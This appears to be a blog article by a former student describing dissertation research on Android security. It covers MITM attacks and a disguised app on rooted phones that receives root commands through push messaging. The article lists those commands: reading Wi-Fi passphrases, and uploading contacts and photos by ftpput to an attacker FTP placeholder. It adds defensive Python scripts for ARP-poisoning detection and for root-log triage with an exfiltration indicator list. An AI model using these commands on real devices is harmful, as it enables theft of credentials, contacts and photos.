Note: The following will only affect people who have rooted their Android smartphone or tablet.
As part of my dissertation when I was a student (I graduated July 2012 at Queen’s University Belfast) I decided to look into issues with Android security. This research focused on Man-in-the-middle (MITM) attacks (to which anything Wi-Fi enabled is susceptible) and the vulnerabilities a user could be exposed to by rooting their device.
First off, let’s have a quick look at MITM attacks. A MITM attack is when an intruder intercepts the connection between two endpoints (most likely a smartphone/laptop and a router) and relays the messages between them, with neither the smartphone nor the router aware this is going on. As a result, the attacker can -
- View login credentials and cookies attached to requests
- Intercept emails (see screenshot below)
- See images being downloaded
- Modify files on-the-fly
This is a common vulnerability in coffee shop or public Wi-Fi scenarios, where it only takes a matter of minutes for an attacker to set up their vantage point. Popular tools which are used in this scenario are -
- arpspoof — Uses the ARP spoofing technique, in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the attacker’s MAC address being linked with the IP address of a legitimate computer or server on the network
- sslstrip (by Moxie Marlinspike @moxie) — Hijacks HTTP traffic on a network, watches for HTTPS links and redirects, then maps those links into either look-alike HTTP links or homograph-similar HTTPS links.
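Both tools above depend on the attacker first poisoning the victim’s ARP cache so that the gateway’s IP resolves to the attacker’s MAC; sslstrip only sees the traffic once that redirection is in place. The following script is an added example written for this article (not the author’s code) that shows what that poisoning looks like from the defender’s side: it parses successive snapshots of Linux-style `arp -a` output and flags the two classic symptoms, the gateway’s MAC changing between snapshots and one MAC answering for several IPs at once. The snapshots embedded in it are constructed sample data.

```python
"""Detect ARP-cache anomalies that typically accompany an arpspoof session.

Added example for this article, not the author's code. It parses Linux-style
`arp -a` output ("? (192.168.1.1) at aa:bb:cc:dd:ee:ff [ether] on wlan0")
from successive snapshots and reports two classic signs of ARP poisoning:
  1. the MAC recorded for an IP (normally the gateway) changes between snapshots;
  2. one MAC address answers for more than one IP in a single snapshot, which is
     what happens when the attacker's interface impersonates the gateway.
The snapshots below are constructed sample data.
"""
import re
from collections import defaultdict

ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return {ip: mac} for every resolved entry in `arp -a` output.
    Incomplete entries ("at <incomplete>") carry no MAC and are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_anomalies(snapshots, gateway_ip):
    """Compare consecutive snapshots and return a list of findings (strings).
    `snapshots` is a list of `arp -a` outputs taken over time; `gateway_ip`
    is the router address whose MAC the attacker has to take over."""
    findings = []
    previous = {}
    for idx, raw in enumerate(snapshots):
        table = parse_arp_table(raw)
        # Sign 1: the gateway's MAC changed since the last snapshot.
        old = previous.get(gateway_ip)
        new = table.get(gateway_ip)
        if old and new and old != new:
            findings.append(f"snapshot {idx}: gateway {gateway_ip} MAC changed {old} -> {new}")
        # Sign 2: one MAC claims several IPs in the same snapshot.
        by_mac = defaultdict(list)
        for ip, mac in table.items():
            by_mac[mac].append(ip)
        for mac, ips in by_mac.items():
            if len(ips) > 1:
                findings.append(f"snapshot {idx}: MAC {mac} answers for {sorted(ips)}")
        previous = table
    return findings

# Constructed sample: snapshot 0 is a clean cache, snapshot 1 shows the gateway
# entry overwritten with the MAC already used by host 192.168.1.50.
CLEAN = """\
? (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0
? (192.168.1.50) at de:ad:be:ef:00:01 [ether] on wlan0
? (192.168.1.77) at <incomplete> on wlan0
"""
POISONED = """\
? (192.168.1.1) at de:ad:be:ef:00:01 [ether] on wlan0
? (192.168.1.50) at de:ad:be:ef:00:01 [ether] on wlan0
"""

if __name__ == "__main__":
    for finding in find_anomalies([CLEAN, POISONED], "192.168.1.1"):
        print(finding)
```

On a real host you would feed it the output of `arp -a` captured every few seconds; a static ARP entry for the gateway, or a switch with dynamic ARP inspection, is the corresponding prevention.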
Now, let’s go back to the title of this article and look at issues with Android specifically. To start off, what is rooting? To quote Wikipedia — “Rooting is the process of allowing users of smartphones, tablets, and other devices running the Android mobile operating system to attain privileged control (known as ‘root access’) within Android’s sub-system”. Why do it? It gives users full administrative control of their device, just like Linux or any other Unix-based operating system. This basically allows them to install or run any applications or commands they want without being restricted by the limitations imposed by carriers and manufacturers.
“Run any commands”
At first this sounds great; the possibilities are endless. The issue is they are not just limitless for you but for anyone (or anything) that has access to your device. The vulnerability I am going to talk about I call “Root Attack Through Cloud to Device Messaging”. Don’t worry, I’m not going to refer to it by that lengthy name for the rest of the article; let’s call it RATC2DM. It is important to note that, unlike MITM attacks, RATC2DM can be used on any network, and the attacker can be anywhere in the world (they might even be 2000 miles away from their victim!). Even a VPN cannot protect the victim.
So what is Cloud to Device Messaging? Google’s C2DM service is used to provide push notifications on all Android devices. This simple, lightweight mechanism is used to tell apps that they should contact a remote server, download updates or that some other type of event has occurred (like being mentioned in a tweet or that you have been invited to play a game with someone on Facebook for the millionth time, that day).
One other thing it can be used for is to send malicious commands which are then interpreted by a mischievous app.
To give an example of this, I developed an Android application posing as a cinema listings viewer. When a user downloaded the application and attempted to install it, they could see it only required a small number of permissions and so did not suspect any malicious code. After installation, the application registered itself with the attacker’s web service using a registration ID generated by the C2DM service. The attacker could then use this registration ID to send commands to the victim’s device at any time, with the output or files then sent to the attacker’s web service. The types of commands that were used included -
- To get real time location data — dumpsys location
- List of accounts associated with the device — dumpsys accounts
- Unencrypted Wi-Fi data including passphrases for access points — cat /data/misc/wifi/wpa_supplicant.conf
- To send SQLite databases containing unencrypted contacts to a web service — ftpput -u <username> -p <password> <ftp-address> <destination-file> <source-file>. In this case <source-file> was /data/data/com.android.providers.contacts/databases/contacts2.db
- Steal photographs from the user’s phone. Firstly, get the list of files in the phone’s Camera folder — cd /sdcard/DCIM/Camera ; ls . Then upload files individually using — ftpput -u <username> -p <password> <ftp-address> <destination-file> '/sdcard/DCIM/Camera/<photo-filename>'
Note: FTP was used at the time but there are plenty of other methods that could be used for file uploading.
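Every one of the commands above has to pass through the device’s root manager (the app that grants su requests), which is the one place a defender can see them. The script below is an added example written for this article, not code from the dissertation or from any root-manager project. Because root managers differ in how they log, the line format it parses (`<ISO time> pkg=<package> cmd="<command>"`) is an assumption, and the log lines, package names and FTP host in it are constructed; the indicators it matches on are exactly the commands and paths listed above.

```python
"""Triage su-request logs from a root manager for the command patterns this
article describes. Added example, not code from the article. Root-manager apps
differ in how they log, so the line format below is an assumption:
    <ISO time> pkg=<package> cmd="<shell command run as root>"
The log lines are constructed sample data; the indicators are the commands and
paths the article lists.
"""
import re
from collections import Counter

LOG_LINE = re.compile(r'^(?P<ts>\S+)\s+pkg=(?P<pkg>\S+)\s+cmd="(?P<cmd>.*)"$')

# Indicators: regex over the root command -> short label for the finding.
INDICATORS = {
    r"\bdumpsys\s+location\b": "location query",
    r"\bdumpsys\s+accounts\b": "account enumeration",
    r"/data/misc/wifi/wpa_supplicant\.conf": "Wi-Fi credential read",
    r"/data/data/com\.android\.providers\.contacts/": "contacts database access",
    r"/sdcard/DCIM/": "camera folder access",
    r"\bftpput\b|\bcurl\b|\bwget\b": "file transfer tool",
}
COMPILED = [(re.compile(p), label) for p, label in INDICATORS.items()]

def parse_log(text):
    """Yield (timestamp, package, command) for each well-formed line."""
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            yield m.group("ts"), m.group("pkg"), m.group("cmd")

def classify(cmd):
    """Return the indicator labels a single root command triggers."""
    return [label for rx, label in COMPILED if rx.search(cmd)]

def triage(text):
    """Aggregate hits per package: {package: Counter(label -> count)}.
    Packages whose root commands trigger no indicator are omitted."""
    report = {}
    for _, pkg, cmd in parse_log(text):
        labels = classify(cmd)
        if labels:
            report.setdefault(pkg, Counter()).update(labels)
    return report

def suspicious_packages(report, min_distinct=2):
    """Packages that trigger at least `min_distinct` different indicator types,
    e.g. reading a data store *and* invoking a transfer tool. A single hit
    (a terminal app listing a directory) is treated as noise."""
    return sorted(p for p, c in report.items() if len(c) >= min_distinct)

# Constructed sample log: a terminal app running `ls` as root is benign noise;
# the "cinema" package reproduces the sequence described in the article.
SAMPLE = """\
2012-06-01T10:00:01 pkg=com.example.terminal cmd="ls /data"
2012-06-01T10:02:17 pkg=com.example.cinema cmd="dumpsys location"
2012-06-01T10:02:18 pkg=com.example.cinema cmd="cat /data/misc/wifi/wpa_supplicant.conf"
2012-06-01T10:02:20 pkg=com.example.cinema cmd="ftpput -u u -p p ftp.example.invalid contacts2.db /data/data/com.android.providers.contacts/databases/contacts2.db"
2012-06-01T10:03:00 pkg=com.example.cinema cmd="cd /sdcard/DCIM/Camera ; ls ."
"""

if __name__ == "__main__":
    report = triage(SAMPLE)
    for pkg in suspicious_packages(report):
        print(pkg, dict(report[pkg]))
```

The useful signal is the combination: an app that reads a credential or contacts store and, within seconds, runs an upload tool has no legitimate reason to do so from a cinema listing. The same logic applies to whatever a given root manager actually records; only the parser needs swapping.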
Clearly, an attacker has full control over a device once the user has given them root privileges. This applies to any application the user has installed. No indication of malicious activity was given to the user; for that to happen, dedicated anti-malware software would be required. As the attack was carried out over the internet, the time required to carry it out depends only on the speed of the device’s internet connection.
There are currently no exact numbers on how many people have rooted their devices, but if we look at CyanogenMod, the most popular open-source version of Android (based on the official releases of Android by Google), it has over 10 million downloads. Every single one of those users is vulnerable to RATC2DM.